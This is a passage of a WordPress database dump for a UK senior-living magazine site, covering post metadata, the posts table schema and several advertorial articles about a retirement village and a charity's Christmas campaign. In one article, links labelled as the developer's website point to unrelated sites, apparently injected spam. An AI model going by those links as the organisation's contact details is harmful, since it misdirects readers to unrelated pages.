um_large\";a:4:{s:4:\"file\";s:51:\"abandoned-waterpark-in-winter_4460x4460-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:52:\"abandoned-waterpark-in-winter_4460x4460-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"newsmagbd_news_block_size\";a:4:{s:4:\"file\";s:51:\"abandoned-waterpark-in-winter_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"newsmagbd_block_size_cropping\";a:4:{s:4:\"file\";s:51:\"abandoned-waterpark-in-winter_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(373,297,'_wp_attached_file','2018/04/abstract-condominium-architecture_4460x4460.jpg'),(374,297,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4460;s:6:\"height\";i:2973;s:4:\"file\";s:55:\"2018/04/abstract-condominium-architecture_4460x4460.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:55:\"abstract-condominium-architecture_4460x4460-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:55:\"abstract-condominium-architecture_4460x4460-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:55:\"abstract-condominium-architecture_4460x4460-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:56:\"abstract-condominium-architecture_4460x4460-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"newsmagbd_news_block_size\";a:4:{s:4:\"file\";s:55:\"abstract-condominium-architecture_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"newsmagbd_block_size_cropping\";a:4:{s:4:\"file\";s:55:\"abstract-condominium-architecture_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(917,40,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2016/08/on-the-move.html'),(928,109,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/01/travel-insurance-you-could-bank-on-2.html'),(931,132,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/03/welcome-to-oldagia.html'),(934,151,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/im-a-very-lucky-man.html'),(937,157,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/out-about.html'),(938,161,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/spotting-the-signs.html'),(941,163,'_edit_lock','1522698963:1'),(944,183,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/05/world-on-a-plate.html'),(951,212,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/money-talks-2.html'),(958,237,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/lacking-energy-get-a-vitamin-b-boost.html'),(959,240,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/own-your-future-3.html'),(962,260,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/interview-herbie-kretzmer-les-miserables-scriptwriter.html'),(963,265,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/the-marvel-of-marrakech.html'),(964,266,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/why-her-majesty-should-invite-mirren-to-perform-at-windsor.html'),(966,159,'_edit_lock','1522699094:1'),(968,273,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/05/how-the-paignton-peach-became-the-face-of-wimbledon.html'),(969,157,'_edit_lock','1522699103:1'),(970,277,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/05/queen-delivers-good-news-for-future-of-state-pension.html'),(971,278,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/05/you-dont-worry-about-things-that-might-have-tortured-you-when-you-were-younger.html'),(972,156,'_edit_lock','1522699251:1'),(973,281,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/10/bernard-gallacher-back-where-he-belongs.html'),(976,284,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/10/dont-let-the-downturn-put-a-downer-on-retirement.html'),(977,286,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/10/how-to-get-the-funeral-you-want.html'),(980,294,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/10/you-can-own-your-future.html'),(981,295,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/11/obituaries.html'),(982,296,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/11/raymond-blanc-you-cant-separate-food-from-life.html'),(983,297,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/11/selina-scotti-would-rather-die-on-my-feet-than-live-on-my-knees.html'),(1740,42,'_edit_lock','1530800648:1'),(1741,42,'_edit_last','1'),(1744,42,'_adinserter_block_exceptions',''),(1745,129,'_edit_lock','1522700924:1'),(1746,129,'_edit_last','1'),(1749,129,'_adinserter_block_exceptions',''),(1805,82,'_edit_lock','1522701411:1'),(1806,82,'_edit_last','1'),(1809,82,'_adinserter_block_exceptions',''),(1810,209,'_edit_lock','1530695106:1'),(1811,214,'_edit_lock','1530695110:1'),(1812,577,'_edit_last','1'),(1813,577,'_edit_lock','1530697536:1'),(1816,577,'_adinserter_block_exceptions',''),(1817,577,'_yoast_wpseo_content_score','60'),(1818,577,'_yoast_wpseo_primary_category',''),(1827,585,'_edit_last','1'),(1837,585,'_adinserter_block_exceptions',''),(1838,585,'_yoast_wpseo_content_score','30'),(1839,585,'_edit_lock','1530696796:1'),(1846,592,'_edit_last','1'),(1847,592,'_edit_lock','1539266499:1'),(1850,592,'_adinserter_block_exceptions',''),(1851,592,'_yoast_wpseo_content_score','60'),(1852,592,'_yoast_wpseo_primary_category','1'),(1858,598,'_edit_last','1'),(1859,598,'_edit_lock','1540457393:1'),(1860,598,'_adinserter_block_exceptions',''),(1861,598,'_yoast_wpseo_content_score','30'),(1862,598,'_yoast_wpseo_primary_category','3'),(1872,605,'_edit_last','1'),(1873,605,'_adinserter_block_exceptions',''),(1874,605,'_yoast_wpseo_content_score','30'),(1875,605,'_yoast_wpseo_primary_category','1'),(1876,605,'_edit_lock','1539933989:1'),(1880,613,'_edit_last','1'),(1881,613,'_edit_lock','1575551602:1'),(1898,613,'_adinserter_block_exceptions',''),(1899,613,'_yoast_wpseo_content_score','60'),(1900,620,'_edit_last','1'),(1901,620,'_edit_lock','1551801568:1'),(1918,620,'_adinserter_block_exceptions',''),(1919,620,'_yoast_wpseo_content_score','90'),(1920,627,'_edit_last','1'),(1921,627,'_edit_lock','1555431224:1'),(1925,627,'_adinserter_block_exceptions',''),(1926,627,'_yoast_wpseo_content_score','90'),(1927,627,'_yoast_wpseo_primary_category','4'),(1928,632,'_edit_last','1'),(1929,632,'_edit_lock','1556893404:1'),(1936,632,'_adinserter_block_exceptions',''),(1937,632,'_yoast_wpseo_content_score','60'),(1938,632,'_yoast_wpseo_primary_category','4'),(1941,644,'_edit_last','1'),(1942,644,'_edit_lock','1583773316:1'),(1958,644,'_yoast_wpseo_content_score','90'),(2129,653,'_edit_lock','1635439337:1'),(2134,660,'_edit_lock','1631263379:1'),(2142,668,'_menu_item_type','custom'),(2143,668,'_menu_item_menu_item_parent','0'),(2144,668,'_menu_item_object_id','668'),(2145,668,'_menu_item_object','custom'),(2146,668,'_menu_item_target',''),(2147,668,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2148,668,'_menu_item_xfn',''),(2149,668,'_menu_item_url','https://www.westonspirit.org.uk/'),(2151,669,'_menu_item_type','post_type'),(2152,669,'_menu_item_menu_item_parent','0'),(2153,669,'_menu_item_object_id','585'),(2154,669,'_menu_item_object','page'),(2155,669,'_menu_item_target',''),(2156,669,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2157,669,'_menu_item_xfn',''),(2158,669,'_menu_item_url',''),(2160,670,'_menu_item_type','post_type'),(2161,670,'_menu_item_menu_item_parent','0'),(2162,670,'_menu_item_object_id','644'),(2163,670,'_menu_item_object','page'),(2164,670,'_menu_item_target',''),(2165,670,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2166,670,'_menu_item_xfn',''),(2167,670,'_menu_item_url',''),(2187,660,'_edit_last','1'),(2192,660,'_wp_old_slug','everything-you-need-to-know-about-drug-detoxing'),(2193,675,'_menu_item_type','post_type'),(2194,675,'_menu_item_menu_item_parent','0'),(2195,675,'_menu_item_object_id','660'),(2196,675,'_menu_item_object','post'),(2197,675,'_menu_item_target',''),(2198,675,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2199,675,'_menu_item_xfn',''),(2200,675,'_menu_item_url',''),(2202,676,'_menu_item_type','post_type'),(2203,676,'_menu_item_menu_item_parent','0'),(2204,676,'_menu_item_object_id','653'),(2205,676,'_menu_item_object','post'),(2206,676,'_menu_item_target',''),(2207,676,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2208,676,'_menu_item_xfn',''),(2209,676,'_menu_item_url',''),(2241,676,'_wp_old_date','2021-08-19'),(2242,670,'_wp_old_date','2021-08-19'),(2243,669,'_wp_old_date','2021-08-19'),(2244,688,'_menu_item_type','post_type'),(2245,688,'_menu_item_menu_item_parent','670'),(2246,688,'_menu_item_object_id','613'),(2247,688,'_menu_item_object','page'),(2248,688,'_menu_item_target',''),(2249,688,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2250,688,'_menu_item_xfn',''),(2251,688,'_menu_item_url',''),(2252,689,'_menu_item_type','post_type'),(2253,689,'_menu_item_menu_item_parent','675'),(2254,689,'_menu_item_object_id','660'),(2255,689,'_menu_item_object','post'),(2256,689,'_menu_item_target',''),(2257,689,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2258,689,'_menu_item_xfn',''),(2259,689,'_menu_item_url',''),(2260,690,'_menu_item_type','post_type'),(2261,690,'_menu_item_menu_item_parent','676'),(2262,690,'_menu_item_object_id','653'),(2263,690,'_menu_item_object','post'),(2264,690,'_menu_item_target',''),(2265,690,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2266,690,'_menu_item_xfn',''),(2267,690,'_menu_item_url',''),(2268,691,'_menu_item_type','post_type'),(2269,691,'_menu_item_menu_item_parent','0'),(2270,691,'_menu_item_object_id','592'),(2271,691,'_menu_item_object','post'),(2272,691,'_menu_item_target',''),(2273,691,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2274,691,'_menu_item_xfn',''),(2275,691,'_menu_item_url',''),(2278,693,'_wp_attached_file','2021/08/drugaddiction.jpg'),(2279,693,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1255;s:4:\"file\";s:25:\"2021/08/drugaddiction.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"drugaddiction-300x196.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"drugaddiction-1024x669.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:669;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"drugaddiction-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"drugaddiction-768x502.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:502;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:27:\"drugaddiction-1536x1004.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1004;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2282,660,'_thumbnail_id','693'),(2283,695,'_wp_attached_file','2021/08/Applying-for-planning-permission-in-Kent.jpg'),(2284,695,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:52:\"2021/08/Applying-for-planning-permission-in-Kent.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:52:\"Applying-for-planning-permission-in-Kent-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:52:\"Applying-for-planning-permission-in-Kent-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:52:\"Applying-for-planning-permission-in-Kent-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2287,653,'_thumbnail_id','695');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_posts`
--

DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=699 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_posts`
--

LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES (33,1,'2016-12-05 16:44:32','2016-12-05 16:44:32','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\"> </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_buttons\" st_title=\"Senior Living Special – Don’t be a summer slouch!\" st_url=\"http://westonspirit.org.uk/2011/08/august-edition-2/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"Senior Living Special – Don’t be a summer slouch!\" st_url=\"http://westonspirit.org.uk/2011/08/august-edition-2/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"Senior Living Special – Don’t be a summer slouch!\" st_url=\"http://westonspirit.org.uk/2011/08/august-edition-2/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"Senior Living Special – Don’t be a summer slouch!\" st_url=\"http://westonspirit.org.uk/2011/08/august-edition-2/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"Senior Living Special – Don’t be a summer slouch!\" st_url=\"http://westonspirit.org.uk/2011/08/august-edition-2/\" displaytext=\"share\"></span></div>&#13;\n				  <p>Senior Living gives the low down on end of season events from music and sport to reliving history. We interview Joan Bakewell, the original “thinking-man’s crumpet” about botox and living wills. And we address that knotty question: when to give up the family home?</p>&#13;\n<p>Distributed with <em>The Sunday Telegraph</em></p>&#13;\n<p><object style=\"width:610px;height:400px\"><param name=\"movie\" value=\"http://static.issuu.com/webembed/viewers/style1/v1/IssuuViewer.swf?mode=embed&amp;documentId=111018075606-2bcc9c1364e04895814f2f328e2bfee3&amp;docName=seniorliving&amp;username=Lyonsdown&amp;loadingInfoText=SeniorLiving&amp;backgroundColor=FFF9B6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" /><param name=\"allowfullscreen\" value=\"true\" /><param name=\"menu\" value=\"false\" /><embed src=\"/webembed/viewers/style1/v1/IssuuViewer.swf\" type=\"application/x-shockwave-flash\" style=\"width:610px;height:400px\" flashvars=\"mode=embed&amp;documentId=111018075606-2bcc9c1364e04895814f2f328e2bfee3&amp;docName=seniorliving&amp;username=Lyonsdown&amp;loadingInfoText=SeniorLiving&amp;backgroundColor=FFF9B6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" allowfullscreen=\"true\" menu=\"false\"></embed></object></p>&#13;\n									</div>','Senior living special','66','publish','open','open','','senior-living-special','','','2018-04-02 20:10:00','2018-04-02 20:10:00','',0,'http://westonspirit.org.uk/senior-living-special.asp',0,'post','',0),(34,1,'2017-10-16 04:04:52','2017-10-16 04:04:52','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">9 August 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Downsizing without the misery\" st_url=\"http://westonspirit.org.uk/2011/08/downsizing-without-the-misery/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Downsizing without the misery\" st_url=\"http://westonspirit.org.uk/2011/08/downsizing-without-the-misery/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Downsizing without the misery\" st_url=\"http://westonspirit.org.uk/2011/08/downsizing-without-the-misery/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Downsizing without the misery\" st_url=\"http://westonspirit.org.uk/2011/08/downsizing-without-the-misery/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Downsizing without the misery\" st_url=\"http://westonspirit.org.uk/2011/08/downsizing-without-the-misery/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Bramshott Place Village offers not only the ideal retirement destination, being easily accessible to SW London via the new A3 Hindhead tunnel, but also a stress-free package to get you there</h4>&#13;\n<p>As people age, moving home can be especially stressful – practically and emotionally. Downsizing from a large family home when you have lived there for years can entail a great deal of work, and the emotional wrench of leaving a familiar community can be very difficult.</p>&#13;\n<p>To help alleviate these worries, Urban Renaissance Villages has introduced a complimentary moving package, available to all those buying at Bramshott Place Village, which includes a move manager and de-cluttering facility along with a packing and moving service.</p>&#13;\n<p>However, possibly the most reassuring aspect of Bramshott Place Village, and what makes this development so attractive, is that it really is a village, with a lively community already in place and a host of social activities to enjoy. There’s a handy local store, a domestic cleaning service and laundry service, plus there’s a medical centre in the clubhouse. And of course there’s the fitness centre, library, games room, bar and restaurant, which are all available exclusively to residents.</p>&#13;\n<p>How does the moving package work? On the day of reservation, every buyer receives a personal move manager who is on hand right up to moving day to deal with any questions, queries or emergencies. Move managers also help residents adjust to their new surroundings. Many of our residents are moving out of the family home and away from familiar neighbourhoods where they’ve been going to the same doctor, shop or pub for years, even decades.</p>&#13;\n<p><img class=\"alignright size-large wp-image-738\" title=\"Bramshott Place\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/08/New-BPV-exterior-Aug-2011-1024x682.jpg\" alt=\"\" width=\"596\" height=\"396\" />As part of the moving package we also provide a personal de-clutterer, who gives advice on everything from downsizing to organising paperwork. Sorting through possessions collected over many years can feel daunting, so in the weeks prior to the move our de-clutterer spends time with our buyers, carefully going through their possessions and helping them decide what items they’ll take to their new home and what can be donated, sold or auctioned. The de-cluttering package incudes 12 hours of her time, at least two of which are spent on the day of the move.</p>&#13;\n<p>In addition, the moving package includes a specialist removal company with experience and expertise in moving downsizers. On moving day they help pack possessions, carefully move everything to the resident’s new home at Bramshott Place Village and then unpack. They also provide soft pack bags, cartons and carpet protectors.</p>&#13;\n<p>Our moving package is completely free of charge in the majority of cases for all mainland locations within a 150-mile radius of Liphook, Hampshire. Those moving from further afield can also enjoy the benefits of the moving package although a fee will be charged. At Bramshott Place Village, our aim is to make moving home stress-free and to ensure our new residents feel at home as quickly as possible.</p>&#13;\n<p>Set in acres of parkland with beautifully maintained gardens, the luxury cottages and apartments are ideal for the older person who is keen to remain active and independent and have the added security of an on-site manager around the clock.</p>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<p><em><strong>Urban Renaissance Villages</strong> is also building in Faygate, near Horsham, West Sussex, and Exeter, Devon. For more on Bramshott Place Village, Liphook, please contact the marketing suite on<strong> 01428 722800</strong> or visit <strong><a title=\"\" href=\"http://www.101thingstodoinengland.co.uk/visit-bournemouth-enjoy-wonders-nature\" target=\"_blank\">www.101thingstodoinengland.co.uk/</a></strong></em></p>&#13;\n<p><em><strong>Bill Gair</strong> is chief executive of <strong>Urban Renaissance Villages</strong></em></p>&#13;\n<p><em><strong><a title=\"www.urv.uk.com\" href=\"http://www.urv.uk.com/\" target=\"_blank\">http://edwardsandelliott.co.uk/what-are-we-on-about</a></strong></em></p>&#13;\n</div>&#13;\n									</div>','Downsizing without the misery','564','publish','open','open','','downsizing-without-the-misery','','','2018-04-02 20:09:59','2018-04-02 20:09:59','',0,'http://westonspirit.org.uk/downsizing-without-the-misery.asp',0,'post','',0),(35,1,'2016-01-21 13:37:31','2016-01-21 13:37:31','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">9 August 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Finding friends at Christmas\" st_url=\"http://westonspirit.org.uk/2011/08/finding-friends-at-christmas/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Finding friends at Christmas\" st_url=\"http://westonspirit.org.uk/2011/08/finding-friends-at-christmas/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Finding friends at Christmas\" st_url=\"http://westonspirit.org.uk/2011/08/finding-friends-at-christmas/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Finding friends at Christmas\" st_url=\"http://westonspirit.org.uk/2011/08/finding-friends-at-christmas/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Finding friends at Christmas\" st_url=\"http://westonspirit.org.uk/2011/08/finding-friends-at-christmas/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Older people don’t have to be lonely over the festive season with housing and care national charity Abbeyfield’s Companionship at Christmas campaign</h4>&#13;\n<p>Towards the end of summer, families up and down the country start the countdown to Christmas which, for most people, is a time of good cheer and a chance to see family and friends. But a growing number of older people will spend the festive season alone.</p>&#13;\n<p>An estimated 850,000 Britons are chronically lonely and, while this isolation is a daily issue, Christmas heightens concern for older people living alone. Statistics indicate that over-65’s are likely to spend the festive period on their own due to distance from family, tighter financial conditions or practical circumstances like weather problems.<img class=\"alignright size-medium wp-image-835\" title=\"NEW 8\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/08/NEW-8-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" /></p>&#13;\n<p>To help combat this increasing trend, charity Abbeyfield is once again running the Companionship at Christmas nationwide campaign – a home-from-home alternative for older people wishing to spend the festive period with others.</p>&#13;\n<p>The organisation is inviting members of local communities with elderly neighbours living alone, family members in need of respite support and those who plan to spend the Christmas period alone to get in touch.</p>&#13;\n<p>As part of the campaign, Abbeyfield will be offering overnight stays and delicious Christmas lunches throughout the festive season (from Christmas Eve to 4 January) across many of its houses nationwide – totally free of charge. Participation can be over the whole period or just for one day – the choice is up to individuals. Abbeyfield wants to hear from people who are:</p>&#13;\n<ul><li>over 55</li>&#13;\n<li>alone over Christmas</li>&#13;\n<li>currently living independently in their own home.</li>&#13;\n</ul><p>Established in 1956 by Major Richard Carr-Gomm, Abbeyfield was founded with the aim of alleviating loneliness and enhancing the quality of life for older people. Today the charity has more than 700 houses across the UK, 80 care homes and two nursing homes looking after 7,000 residents. Abbeyfield has over 7,000 staff and over 10,000 people volunteer with the organisation.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em>For more information on the Companionship at Christmas campaign, visit <strong><a title=\"www.abbeyfield.com\" href=\"http://www.abbeyfield.com/\" target=\"_blank\">www.abbeyfield.com</a></strong>, call <strong>01727 734107</strong> or email <strong>s.alleyne@abbeyfield.com,</strong> quoting The Sunday Telegraph.</em></p>&#13;\n									</div>','Finding friends at Christmas','332','publish','open','open','','finding-friends-at-christmas','','','2018-04-02 20:09:57','2018-04-02 20:09:57','',0,'http://westonspirit.org.uk/finding-friends-at-christmas.asp',0,'post','',0),(37,1,'2015-01-27 22:54:59','2015-01-27 22:54:59','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">13 August 2016</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"How Doris ‘met’ my mother\" st_url=\"http://westonspirit.org.uk/2011/08/how-doris-%e2%80%98met%e2%80%99-my-mother/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"How Doris ‘met’ my mother\" st_url=\"http://westonspirit.org.uk/2011/08/how-doris-%e2%80%98met%e2%80%99-my-mother/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"How Doris ‘met’ my mother\" st_url=\"http://westonspirit.org.uk/2011/08/how-doris-%e2%80%98met%e2%80%99-my-mother/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"How Doris ‘met’ my mother\" st_url=\"http://westonspirit.org.uk/2011/08/how-doris-%e2%80%98met%e2%80%99-my-mother/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"How Doris ‘met’ my mother\" 